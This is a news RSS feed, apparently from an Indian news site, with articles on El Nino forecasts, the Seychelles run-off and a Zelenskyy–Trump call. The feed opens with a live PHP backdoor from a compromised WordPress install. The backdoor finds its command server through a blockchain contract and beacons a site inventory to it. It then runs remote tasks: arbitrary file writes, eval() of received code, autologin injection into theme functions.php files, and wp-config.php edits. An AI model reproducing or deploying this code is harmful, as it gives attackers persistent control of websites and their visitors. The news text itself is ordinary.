// lr_0h if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/home/u259102958/domains/pressmediaofindia.com/public_html/wp-content/plugins/wp-helper-255c09/wp-helper-255c09.php', 'ctrl'=>'// lr_0h', 'vis'=>'// ix_0g', 'vis_func'=>'wp_c6u1ff', 'vis_paths'=>array('/home/u259102958/domains/pressmediaofindia.com/public_html/wp-content/plugins/wp-helper-255c09/wp-helper-255c09.php'), 'opt'=>'_wp_o2aixs5k', ); $keys=array(); $keys['id']='t6q'; $keys['ver']='k3'; $keys['caps']='61c'; $keys['tasks']='vx7'; $keys['interval']='xe8'; $keys['ack_id']='91k'; $keys['ok']='3j'; $keys['detail']='u2s'; $keys['inv']='n1t'; $keys['result']='61f'; $hdr='X-ZNJ-Auth';$tok='xxqNSKHPOHc8eXENTh0wiZBtBXr5UsDeqrM1w_9hfB0';$id='b2572e841d094507';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); article – Pressmediaofindia https://pressmediaofindia.com Sat, 06 Jun 2026 02:18:45 +0000 en-US hourly 1 UN warns El Nino could be the strongest in decades https://pressmediaofindia.com/un-warns-el-nino-could-be-the-strongest-in-decades/ Sat, 06 Jun 2026 02:17:21 +0000 https://pressmediaofindia.com/?p=148564 06-06-2026

NEW YORK: A new phase of the natural El Nino weather pattern could begin in a matter of weeks, the UN has warned, boosting temperatures on a planet already under strain from climate change.

The World Meteorological Organization said this El Nino is likely to strengthen over the rest of 2026, driving more extreme weather around much of the globe.

Several forecasts from national weather agencies suggest it could end up as one of the strongest ever recorded, a possible so-called “super” El Nino.

Predicting the exact timing and strength of El Nino can be challenging, and scientists have been watching conditions in a tell-tale region of the central Pacific for clues.

El Nino forms when a switch in wind patterns allows warmer waters to spread across the tropical Pacific Ocean and while an El Nino event had been anticipated, many scientists believe this one could be unusually powerful.

“We’re very confident that there’s a big event coming,” said Prof Adam Scaife, head of monthly to decadal prediction at the UK Met Office. “It may even be a record event.”

Part of the reason why scientists expect a strong El Nino lies deep below the ocean surface.

Data from satellites, buoys and ocean floats indicate a huge wave of unusually warm water more than 6C above average in places creeping eastwards across the Pacific, hundreds of meters deep.

The warmth of these waters “rival(s) some of the strongest El Nino events we have seen”, said Michelle L’Heureux, a physical scientist at the US science agency NOAA’s Climate Prediction Center.

That deep-sea heat is often a precursor to warmer waters at the surface which then heat the air above, helping to disrupt weather patterns worldwide.

“El Nino conditions will pour fuel on the fire of a warming world,” said UN secretary general António Guterres. “Impacts will hit even harder, travel even farther, and cross borders with devastating speed.”

No two El Nino events are the same, and different places can be affected at different times of the year but a strong El Nino typically fuels hot, dry weather in parts of South America, South East Asia and Australia, raising the chances of droughts and wildfires. It can also weaken the Indian monsoon and bring drier conditions to northern parts of the Greater Horn of Africa – while heavier rainfall can increase the risks of flooding in the southern US.

El Nino can even increase the chances of a mild start and cold end to UK winters although its links with weather in north-west Europe are not as strong.

Past events have been linked to spikes in food prices and hundreds of billions or even trillions of dollars in lost income globally, as crop failures and trade disruptions ripple through supply chains and economies.

As El Nino typically peaks in strength around Christmas time, it is impossible to know for sure that it will be a record-breaker with months still to go.

El Nino is very sensitive to wind patterns, for example, which are difficult to predict far in advance, “the biggest wildcard” for El Nino, according to L’Heureux but even if El Niño falls short of “super” territory, the consequences could still be extreme.

That is because we have never experienced El Nino on a planet already so hot from human-caused climate change.

The year “2027 is very likely at this point to be the [world’s] warmest year on record,” said Zeke Hausfather, a climate scientist with the Berkeley Earth group in the US.

In 1998, the world had “an incredibly strong El Nino event and an incredibly hot year for the time”, he added. “If (that) happened today, it would be an incredibly cold year compared to the last two decades.” (Int’l News Desk)

]]>
Seychelles’ Patrick Herminie wins presidential run-off election https://pressmediaofindia.com/seychelles-patrick-herminie-wins-presidential-run-off-election/ Mon, 13 Oct 2025 00:19:05 +0000 https://pressmediaofindia.com/?p=131518 13-10-2025

VICTORIA: Seychelles’ opposition leader, Patrick Herminie, has won the country’s presidential race, defeating incumbent leader Wavel Ramkalawan in a run-off vote, according to the electoral commission.

Herminie won 52.7 percent of the vote, while Ramkalawan took 47.3 percent, official results announced early on Sunday showed.

In his victory speech, Herminie pledged to lower the cost of living, revive public services and unite the island nation.

“The people have spoken,” the 62-year-old said at the headquarters of the electoral commission.

“I am deeply humbled for the trust that the people have placed in me. I will be the president of all Seychellois, and I will end divisions by ceasing preferences, and giving everyone the opportunity to thrive,” he said.

Herminie’s victory gives his United Seychelles party full control of the government after it also reclaimed a majority in parliament during the first round of the general election last month.

The win is also a complete turnaround for Herminie, who in 2023 was arrested on charges of witchcraft that were later dropped. He previously served as speaker of the country’s parliament from 2007 to 2016.

Ramkalawan, who attended the electoral commission’s announcement of the results, congratulated Herminie, who becomes Seychelles’ sixth president.

“I leave with a legacy that makes many presidents blush… I hope President Herminie continues to maintain such a level,” he said.

Images published by the Seychelles Nation newspaper showed the two leaders shaking hands after the announcement.

Outside the electoral commission headquarters, thousands of Herminie’s supporters erupted in cheers and waved the country’s flag and party banners as they greeted him following his proclamation as the winner, according to videos on social media.

The race between the two main contenders was decided in a run-off after there was no outright winner in the presidential vote two weeks ago. Early voting began on Thursday, but most people in the island nation voted on Saturday.

Herminie and Ramkalawan ran spirited campaigns trying to address key issues for voters, including environmental damage and a crisis of drug addiction in a country long seen as a tourist haven.

Ramkalawan campaigned for re-election on his management of Seychelles’ economic recovery from the COVID-19 pandemic and expansion of social protections but voters opted for Herminie, who accused Ramkalawan of presiding over a proliferation of corruption, and promised to cancel a hotel project permitted by his government that environmentalists say threatens a UNESCO-listed coral atoll.

Herminie has also pledged to lower the retirement age from 65 to 63 and implement recommendations from a truth and reconciliation commission that examined human rights abuses related to a 1977 coup and its aftermath.

A physician by training, he previously headed the government’s anti-drug agency, and has promised to tackle the country’s sky-high heroin addiction, blamed in part on the fact that the islands sit on a drug route between Africa and Asia.

The country’s Agency for Prevention of Drug Abuse and Rehabilitation says that 5,000 to 6,000 people use heroin out of a population of about 120,000. Other estimates put the figure as high as 10,000.

Seychelles, a nation of 115 islands, is Africa’s wealthiest country per capita.

Located across 1.2 million square kilometres (463,000sq miles) in the western Indian Ocean, it is a prime tourist destination as well as a target for investment from, and security cooperation with, China, Gulf nations and India. (Int’l News Desk)

]]>
Zelenskyy urges Trump to broker end to Ukraine war https://pressmediaofindia.com/zelenskyy-urges-trump-to-broker-end-to-ukraine-war/ Mon, 13 Oct 2025 00:17:35 +0000 https://pressmediaofindia.com/?p=131511 13-10-2025

KYIV: Ukrainian President Volodymyr Zelenskyy has urged Donald Trump to broker peace in Ukraine like in “the Middle East” during a phone call, saying if the United States president could stop one war, “others can be stopped as well.”

Saturday’s call came a day after Russia launched a large-scale attack on Ukraine’s energy grid, knocking out power to parts of the capital, Kyiv, and nine other Ukrainian regions, which have since been restored.

Diplomatic efforts to end Russia’s invasion of Ukraine have slowed in recent weeks, in part because global attention has shifted to brokering a ceasefire in Israel’s war on Gaza, Kyiv said.

Trump, who announced the first phase of a ceasefire between Israel and Hamas on Wednesday, met Russian President Vladimir Putin for talks in August but failed to secure progress on a ceasefire in the European war.

“I had a call with US President Donald Trump. A very positive and productive one,” Zelenskyy said on Facebook, congratulating Trump for his “outstanding” ceasefire plan in the Middle East.

“If a war can be stopped in one region, then surely other wars can be stopped as well, including the Russian war,” Zelenskyy added, calling for Trump to pressure the Kremlin into negotiations.

Relations between the two leaders have warmed dramatically since February when they sparred during a televised meeting at the White House.

Trump has since grown more hostile towards Moscow while expressing sympathy for Ukraine.

In September, he wrote on Truth Social that Kyiv should try to “take back” all its occupied territory with Europe’s and NATO’s help.

US first lady Melania Trump said on Friday that she had secured the release of Ukrainian children abducted by Russia after establishing an extraordinary back channel of communication with Putin.

Russian attacks on Ukraine killed at least five people on Saturday and cut power to parts of southern Ukraine’s Odesa region, according to Ukrainian officials.

Two of the people died inside a church in Kostyantynivka when it was hit by a strike, according to local authorities.

Using ‘Russian assets’

Ukraine’s largest private energy company, DTEK, said “the main work to restore the power supply” was completed but some localised outages were still affecting the Ukrainian capital after Friday’s “massive” Russian attacks.

Ukrainian drone attacks, meanwhile, killed two people in Russia, according to regional officials.

In the Russian border region of Belgorod, a truck driver was killed by a Ukrainian strike, according to local officials.

Moscow has targeted Ukraine’s energy grid each winter since it launched its full-scale invasion in 2022, cutting power and heating to millions of households and disrupting water supplies in what Kyiv says is a brazen war crime.

Russia denies targeting civilians and says Ukraine uses the energy sites to power its military sector.

Both countries have accused each other in recent months of frustrating progress towards a peace deal.

Russia blames Kyiv and its European allies for the impasse, accusing them of undermining peace negotiations with Washington. Ukraine and Europe accuse Russia of playing for time so it can seize more Ukrainian territory. (Int’l Monitoring Desk)

]]>